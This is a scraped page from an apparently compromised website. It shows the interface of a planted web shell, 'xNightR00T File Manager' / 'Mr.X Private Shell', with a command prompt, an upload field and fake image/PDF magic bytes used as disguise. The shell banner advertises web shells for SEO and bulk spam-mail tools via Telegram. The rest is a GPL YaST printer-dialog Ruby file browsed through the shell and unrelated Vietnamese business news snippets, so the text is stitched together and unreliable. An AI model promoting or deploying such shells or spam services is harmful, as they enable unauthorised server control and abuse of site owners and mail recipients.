xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# ------------------------------------------------------------------------------
# Copyright (c) 2006 Novell, Inc. All Rights Reserved.
#
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of version 2 of the GNU General Public License as published by the
# Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail, you may find
# current contact information at www.novell.com.
# ------------------------------------------------------------------------------

# File:        include/printer/dialogs.ycp
# Package:     Configuration of printer
# Summary:     DialogTree definition
# Authors:     Michal Zugec <mzugec@suse.de>
#
# $Id: dialogs.ycp 27914 2006-02-13 14:32:08Z locilka $
module Yast
  module PrinterDialogsInclude
    def initialize_printer_dialogs(include_target)
      Yast.import "UI"

      textdomain "printer"

      Yast.import "Label"
      Yast.import "DialogTree"

      Yast.include include_target, "printer/helps.rb"
      Yast.include include_target, "printer/overview.rb"
      Yast.include include_target, "printer/printingvianetwork.rb"
      Yast.include include_target, "printer/sharing.rb"
      Yast.include include_target, "printer/policies.rb"
      Yast.include include_target, "printer/autoconfig.rb"

      @widgets_handling = {
        "OVERVIEW"        => {
          "widget"        => :custom,
          "custom_widget" => @widgetOverview,
          "init"          => fun_ref(method(:initOverview), "void (string)"),
          "handle"        => fun_ref(
            method(:handleOverview),
            "symbol (string, map)"
          ),
          "help"          => Ops.get_string(@HELPS, "overview", "")
        },
        "NETWORKPRINTING" => {
          "widget"        => :custom,
          "custom_widget" => @widgetNetworkPrinting,
          "init"          => fun_ref(
            method(:initNetworkPrinting),
            "void (string)"
          ),
          "handle"        => fun_ref(
            method(:handleNetworkPrinting),
            "symbol (string, map)"
          ),
          "help"          => Ops.get_string(
            @HELPS,
            "printing_via_network_dialog",
            ""
          )
        },
        "SHARING"         => {
          "widget"        => :custom,
          "custom_widget" => @widgetSharing,
          "init"          => fun_ref(method(:initSharing), "void (string)"),
          "handle"        => fun_ref(
            method(:handleSharing),
            "symbol (string, map)"
          ),
          "help"          => Ops.get_string(@HELPS, "sharing_dialog", "")
        },
        "POLICIES"        => {
          "widget"        => :custom,
          "custom_widget" => @widgetPolicies,
          "init"          => fun_ref(method(:initPolicies), "void (string)"),
          "handle"        => fun_ref(
            method(:handlePolicies),
            "symbol (string, map)"
          ),
          "help"          => Ops.get_string(@HELPS, "policies", "")
        },
        "AUTOCONFIG"      => {
          "widget"        => :custom,
          "custom_widget" => @widgetAutoconfig,
          "init"          => fun_ref(method(:initAutoconfig), "void (string)"),
          "handle"        => fun_ref(
            method(:handleAutoconfig),
            "symbol (string, map)"
          ),
          "help"          => Ops.get_string(@HELPS, "autoconfig", "")
        }
      }

      @tabs_description = {
        "overview"   => {
          "header"          => _("Printer Configurations"),
          "tree_item_label" => _("Printer Configurations"),
          "caption"         => _("Printer Configurations"),
          "contents"        => VBox("OVERVIEW"),
          "widget_names"    => ["OVERVIEW"]
        },
        "network"    => {
          "header"          => _("Print via Network"),
          "tree_item_label" => _("Print via Network"),
          "caption"         => _("Print via Network"),
          "contents"        => VBox("NETWORKPRINTING"),
          "widget_names"    => ["NETWORKPRINTING"]
        },
        "sharing"    => {
          "header"          => _("Share Printers"),
          "tree_item_label" => _("Share Printers"),
          "caption"         => _("Share Printers"),
          "contents"        => VBox("SHARING"),
          "widget_names"    => ["SHARING"]
        },
        "policies"   => {
          "header"          => _("Policies"),
          "tree_item_label" => _("Policies"),
          "caption"         => _("Policies"),
          "contents"        => VBox("POLICIES"),
          "widget_names"    => ["POLICIES"]
        },
        "autoconfig" => {
          "header"          => _("Automatic Configuration"),
          "tree_item_label" => _("Automatic Configuration"),
          "caption"         => _("Automatic Configuration"),
          "contents"        => VBox("AUTOCONFIG"),
          "widget_names"    => ["AUTOCONFIG"]
        }
      }

      @AutoDialog_widgets_handling = {
        "OVERVIEW"        => {
          "widget"        => :custom,
          "custom_widget" => @widgetOverview,
          "init"          => fun_ref(method(:initOverview), "void (string)"),
          "handle"        => fun_ref(
            method(:handleOverview),
            "symbol (string, map)"
          ),
          "help"          => Ops.get_string(@HELPS, "AutoYaSToverview", "")
        },
        "NETWORKPRINTING" => {
          "widget"        => :custom,
          "custom_widget" => @widgetNetworkPrinting,
          "init"          => fun_ref(
            method(:initNetworkPrinting),
            "void (string)"
          ),
          "handle"        => fun_ref(
            method(:handleNetworkPrinting),
            "symbol (string, map)"
          ),
          "help"          => Ops.get_string(
            @HELPS,
            "printing_via_network_dialog",
            ""
          )
        }
      }

      @AutoDialog_tabs_description = {
        "overview" => {
          "header"          => _("AutoYaST Printer Configurations"),
          "tree_item_label" => _("Printer Configurations"),
          "caption"         => _("AutoYaST Printer Configurations"),
          "contents"        => VBox("OVERVIEW"),
          "widget_names"    => ["OVERVIEW"]
        },
        "network"  => {
          "header"          => _("AutoYaST Print via Network Settings"),
          "tree_item_label" => _("Print via Network"),
          "caption"         => _("AutoYaST Print via Network Settings"),
          "contents"        => VBox("NETWORKPRINTING"),
          "widget_names"    => ["NETWORKPRINTING"]
        }
      }
    end

    def runMainDialog
      caption = _("Detected Printers")
      ret = DialogTree.ShowAndRun(
        {
          "ids_order"      => [
            "overview",
            "network",
            "sharing",
            "policies",
            "autoconfig"
          ],
          "initial_screen" => "overview",
          "screens"        => @tabs_description,
          "widget_descr"   => @widgets_handling,
          # All the dialogs in "ids_order" are single (step) configuration dialogs
          # and according to the YaST Style Guide (dated Thu, 06 Nov 2008)
          # there is no longer a "abort" functionality which exits the whole module.
          # Instead this button is now named "Cancel" and its functionality is
          # to go back to the Overview dialog (i.e. what the "back" button would do)
          # because it reads "Cancel - Closes the window and returns to the overview."
          # Therefore the button with the "abort" functionality is not shown at all
          # and the button with the "back" functionality is named "Cancel".
          "abort_button"   => nil,
          "back_button"    => Label.CancelButton,
          "next_button"    => Label.OKButton
        }
      )
      ret
    end

    def runAutoDialog
      caption = _("AutoYaST Settings for Printing with CUPS via Network")
      ret = DialogTree.ShowAndRun(
        {
          "ids_order"      => ["overview", "network"],
          "initial_screen" => "overview",
          "screens"        => @AutoDialog_tabs_description,
          "widget_descr"   => @AutoDialog_widgets_handling,
          # All the dialogs in "ids_order" are single (step) configuration dialogs
          # and according to the YaST Style Guide (dated Thu, 06 Nov 2008)
          # there is no longer a "abort" functionality which exits the whole module.
          # Instead this button is now named "Cancel" and its functionality is
          # to go back to the Overview dialog (i.e. what the "back" button would do)
          # because it reads "Cancel - Closes the window and returns to the overview."
          # Therefore the button with the "abort" functionality is not shown at all
          # and the button with the "back" functionality is named "Cancel".
          "abort_button"   => nil,
          "back_button"    => Label.CancelButton,
          "next_button"    => Label.OKButton
        }
      )
      ret
    end
  end
end

Filemanager

Name Type Size Permission Actions
autoconfig.rb File 11.56 KB 0644
basicadd.rb File 36.47 KB 0644
basicmodify.rb File 57.75 KB 0644
connectionwizard.rb File 143.11 KB 0644
dialogs.rb File 9.27 KB 0644
driveradd.rb File 33.8 KB 0644
driveroptions.rb File 8.34 KB 0644
helps.rb File 60.67 KB 0644
overview.rb File 53.57 KB 0644
policies.rb File 17.23 KB 0644
printingvianetwork.rb File 52.19 KB 0644
readwrite.rb File 4.17 KB 0644
sharing.rb File 51.58 KB 0644
wizards.rb File 8.59 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
admin f – Page 2 – Seiko Business Matching
December 29, 2023
SK Investment Vina III Pte. Ltd (SK Vina III), a subsidiary of South Korea’s third-largest conglomerate SK Group, aims to hold a 65 per cent stake in […]
December 29, 2023
Vietnam continues to shine as an attractive business destination with foreign direct investment (FDI) surging in 2023. According to data by the Foreign Investment Agency (FIA) […]
December 26, 2023
Japan will continue providing more of its official development assistance to Vietnam in a series of sectors, especially in infrastructure projects. Japanese Prime Minister Kishida Fumio […]
December 19, 2023
Bình Minh Proposal made at meeting between Prime Minister Pham Minh Chinh and JICA President Tanaka Akihiko in Tokyo on December 18. During his meeting with […]